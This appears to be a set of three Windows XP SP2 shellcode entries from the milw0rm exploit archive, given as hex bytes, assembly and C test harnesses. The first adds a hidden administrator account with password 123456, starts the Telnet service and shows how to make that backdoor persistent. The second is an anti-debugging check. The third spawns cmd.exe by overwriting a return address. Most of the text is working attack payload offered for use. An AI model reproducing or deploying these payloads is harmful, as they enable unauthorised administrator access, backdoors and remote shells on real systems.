Win32 telnetbind by winexec 111 bytes

; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
Data:
CALL Exec
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;add user exploitvuln with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)

#milw0rm

win32 PEB!NtGlobalFlags shellcode 14 bytes

/*

PEB!NtGlobalFlags ( 14 BYTES )
Author: Koshi
Description: Uses PEB method to determine whether a debugger is
       attached to the running proccess or not. No 9x. :(
Length: 14 Bytes
Registers Used: EAX,ESI,ESP
Compiled: jpXV34dd3v09Fh

*/

/*

00401000 >   6A 70          PUSH 70
00401002     58             POP EAX
00401003     56             PUSH ESI
00401004     333464         XOR ESI,DWORD PTR SS:[ESP]
00401007     64:3376 30     XOR ESI,DWORD PTR FS:[ESI+30]
0040100B     3946 68        CMP DWORD PTR DS:[ESI+68],EAX
        JE DebuggerPresent ( If equal debugger attached )
*/

unsigned char Shellcode[] =
{"\x6A\x70\x58\x56\x33\x34\x64"
"\x64\x33\x76\x30\x39\x46\x68"};



int main( int argc, char *argv[] )
{
printf( "Shellcode is %u bytes.\n", sizeof(Shellcode)-1 );
printf( Shellcode, sizeof(Shellcode) );
return 0;
}

# milw0rm

win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes

/*
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

# milw0rm